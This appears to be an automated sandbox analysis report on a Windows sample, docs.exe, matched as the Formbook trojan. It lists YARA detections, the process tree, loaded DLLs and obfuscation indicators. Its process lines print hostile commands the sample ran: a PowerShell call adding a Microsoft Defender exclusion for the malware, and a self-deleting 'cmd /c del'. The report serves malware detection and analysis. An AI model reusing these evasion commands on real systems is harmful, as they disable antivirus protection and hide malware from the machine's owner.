          Source: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: docs.exe PID: 2672, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: docs.exe PID: 4620, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
          Source: Process Memory Space: wscript.exe PID: 2224, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: docs.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, gvZomwe6c5cc4pjo9P.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, gvZomwe6c5cc4pjo9P.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, gvZomwe6c5cc4pjo9P.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.docs.exe.7370000.4.raw.unpack, gvZomwe6c5cc4pjo9P.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.docs.exe.7370000.4.raw.unpack, gvZomwe6c5cc4pjo9P.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.docs.exe.7370000.4.raw.unpack, gvZomwe6c5cc4pjo9P.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, uSRLTvumudq6gGeKK7.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.docs.exe.7370000.4.raw.unpack, uSRLTvumudq6gGeKK7.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: classification engineClassification label: mal100.troj.evad.winEXE@12/6@11/2
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0058B52D FormatMessageW,LocalAlloc,GetLastError,swprintf_s,FormatMessageA,LocalAlloc,sprintf_s,MultiByteToWideChar,LocalAlloc,MultiByteToWideChar,SysAllocString,LocalFree,LocalFree,8_2_0058B52D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005908FD CLSIDFromProgID,CoCreateInstance,8_2_005908FD
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_00596D75 FindResourceExW,LoadResource,8_2_00596D75
          Source: C:\Users\user\Desktop\docs.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\docs.exe.logJump to behavior
          Source: C:\Users\user\Desktop\docs.exeMutant created: \Sessions\1\BaseNamedObjects\nWrVidnBYAfcOGgDbo
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5376:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5760:120:WilError_03
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mrzyb2gx.gyv.ps1Jump to behavior
          Source: docs.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: docs.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
          Source: C:\Users\user\Desktop\docs.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\docs.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: docs.exeReversingLabs: Detection: 44%
          Source: unknownProcess created: C:\Users\user\Desktop\docs.exe "C:\Users\user\Desktop\docs.exe"
          Source: C:\Users\user\Desktop\docs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\docs.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\docs.exeProcess created: C:\Users\user\Desktop\docs.exe "C:\Users\user\Desktop\docs.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SysWOW64\wscript.exe"
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\docs.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\docs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\docs.exe"Jump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess created: C:\Users\user\Desktop\docs.exe "C:\Users\user\Desktop\docs.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SysWOW64\wscript.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\docs.exe"Jump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\docs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\docs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: docs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: docs.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: docs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wscript.pdbGCTL source: docs.exe, 00000005.00000002.2213093676.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, docs.exe, 00000005.00000002.2213646142.0000000000EC0000.00000040.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: docs.exe, 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2212919973.000000000470C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2215494344.00000000048B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: docs.exe, docs.exe, 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, wscript.exe, 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2212919973.000000000470C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2215494344.00000000048B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wscript.pdb source: docs.exe, 00000005.00000002.2213093676.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, docs.exe, 00000005.00000002.2213646142.0000000000EC0000.00000040.10000000.00040000.00000000.sdmp, wscript.exe, wscript.exe, 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: fdGd.pdbSHA256 source: docs.exe
          Source: Binary string: fdGd.pdb source: docs.exe

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: 0.2.docs.exe.56a0000.3.raw.unpack, MainForm.cs.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
          Source: 0.2.docs.exe.3fd9c80.0.raw.unpack, MainForm.cs.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, gvZomwe6c5cc4pjo9P.cs.Net Code: pUcdNfth0P System.Reflection.Assembly.Load(byte[])
          Source: 0.2.docs.exe.7370000.4.raw.unpack, gvZomwe6c5cc4pjo9P.cs.Net Code: pUcdNfth0P System.Reflection.Assembly.Load(byte[])
          Source: 0.2.docs.exe.3ff1ea0.2.raw.unpack, MainForm.cs.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
          Source: docs.exeStatic PE information: 0xDE85E6B9 [Tue Apr 20 16:35:05 2088 UTC]
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_013BDB28 pushad ; retf 0_2_013BDB29
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_0548879C pushad ; ret 0_2_054887A5
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_054831D0 pushad ; retf 0_2_054831F1
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_054831F2 push esp; retf 0_2_054831F9
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_05486DC0 pushad ; ret 0_2_05486DC9
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_05487FD8 push eax; mov dword ptr [esp], edx0_2_05487FEC
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00416825 push ecx; iretd 5_2_00416829
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_004168EA push ecx; ret 5_2_004168F6
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00417116 push ss; iretd 5_2_00417118
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00417132 push ecx; iretd 5_2_00417133
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0041E9B2 push edx; iretd 5_2_0041E9B3
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0041EA0C push 6B25699Fh; iretd 5_2_0041EA11
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00416B3D push ds; retf 5_2_00416B4E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0040A47D pushad ; ret 5_2_0040A47E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0041D4D2 push eax; ret 5_2_0041D4D8
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0041D4DB push eax; ret 5_2_0041D542
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0041D485 push eax; ret 5_2_0041D4D8
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0041D53C push eax; ret 5_2_0041D542
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F1225F pushad ; ret 5_2_00F127F9
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F127FA pushad ; ret 5_2_00F127F9
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F1283D push eax; iretd 5_2_00F12858
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F409AD push ecx; mov dword ptr [esp], ecx5_2_00F409B6
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F11344 push eax; iretd 5_2_00F11369
          Source: C:\Windows\explorer.exeCode function: 6_2_0FE979B5 push esp; retn 0000h6_2_0FE97AE7
          Source: C:\Windows\explorer.exeCode function: 6_2_0FE97B02 push esp; retn 0000h6_2_0FE97B03
          Source: C:\Windows\explorer.exeCode function: 6_2_0FE97B1E push esp; retn 0000h6_2_0FE97B1F
          Source: C:\Windows\explorer.exeCode function: 6_2_1047E9B5 push esp; retn 0000h6_2_1047EAE7
          Source: C:\Windows\explorer.exeCode function: 6_2_1047EB02 push esp; retn 0000h6_2_1047EB03
          Source: C:\Windows\explorer.exeCode function: 6_2_1047EB1E push esp; retn 0000h6_2_1047EB1F
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_00597C89 push ecx; ret 8_2_00597C9C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A627FA pushad ; ret 8_2_04A627F9
          Source: docs.exeStatic PE information: section name: .text entropy: 7.646714228019074
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, W0CO6nx2lbf45N3dZB.csHigh entropy of concatenated method names: 'FyeSHy7wOY', 'PPnSaJ1JJc', 'PmkSx4D3VE', 'ADDSq7VDix', 'oygSXmHHB8', 'DrbSkbtbqM', 'mxeSBtV43o', 'EbRSm9wnxa', 'QVtSLfYees', 'F2dS95MGMW'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, gvZomwe6c5cc4pjo9P.csHigh entropy of concatenated method names: 'dTvipCo47p', 'XU7iJM33cp', 'Grbi3tdaMX', 'IyFi4dpTkd', 'HZFi6tHkmI', 'IRAiMVjBI6', 'P7Mi860EgN', 'fQUieBZaJZ', 'HHiiZdn7Gu', 'A88iYreIIk'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, QusdL9AWQuEDZLo2qk.csHigh entropy of concatenated method names: 'DgHKu8g4if', 'gJQKtp4MEd', 'eEQKWTZr40', 'hP7KXtcaO8', 'vSgKBKc5Y0', 'z5mKmnxyIJ', 'fDaK9bqd18', 'guLKw57hmH', 'Kx1KH893xF', 'P0OKQtgFCy'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, C382v4CSP1CfdGk3jL.csHigh entropy of concatenated method names: 'ToString', 'ShLyQDWB75', 'kucyXA7cLE', 'KK6ykwWp79', 'gxRyBREn2w', 'TNhym7Uks1', 'PiJyLa7jSa', 'mTPy95KASi', 'XYIywWJQkX', 'pL7y2uf49l'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, xOJxjE3K2SamCagQoj.csHigh entropy of concatenated method names: 'Dispose', 'vPS0rXSqae', 'ECbOXPH9c4', 'JNdnnpC6YC', 'DhU0F5tktt', 'j790zGAr8E', 'ProcessDialogKey', 'XK9O1BA7Yf', 'cHKO0ADt4q', 'TvGOOHKABq'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, NKABqoFswAiiVih8OX.csHigh entropy of concatenated method names: 'SFph0TKJgS', 'fBbhiJeAdS', 'oMFhdd7P1K', 'yLXhJJdKHO', 'GVSh3QUaEt', 'upkh62rbwp', 'JUyhMe40Fc', 'CvvEgBd72s', 'fe0EnSXsXM', 'r2OErvta3G'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, WcvWMqPxe6glMxDFWx.csHigh entropy of concatenated method names: 'iKRIYnvWGk', 'sH8IsAX9Zt', 'ToString', 'a0RIJmDKij', 'Cw4I3rJdhv', 'qjvI4n4j7u', 'GljI6ipwLj', 'UVvIMjVErL', 'dGwI80qXCR', 'xWKIeTWRNM'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, uSRLTvumudq6gGeKK7.csHigh entropy of concatenated method names: 'tHH3xKyoEn', 'wVM3qeFfto', 'MT63CTSNBS', 'rRE3PqcZOI', 'IAt3DjcHA3', 'GiK352som4', 'bTV3gHHbrU', 'FD13nNawND', 'OsE3ryFAIO', 'bpQ3FNKhvZ'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, LBA7YfrOHKADt4qPvG.csHigh entropy of concatenated method names: 'zjkEW3rcyB', 'wl5EXEeuHH', 'TSMEkAPVnC', 'QTaEBxrcyh', 'MgeExtGkXA', 'wwiEmIeH4I', 'Next', 'Next', 'Next', 'NextBytes'
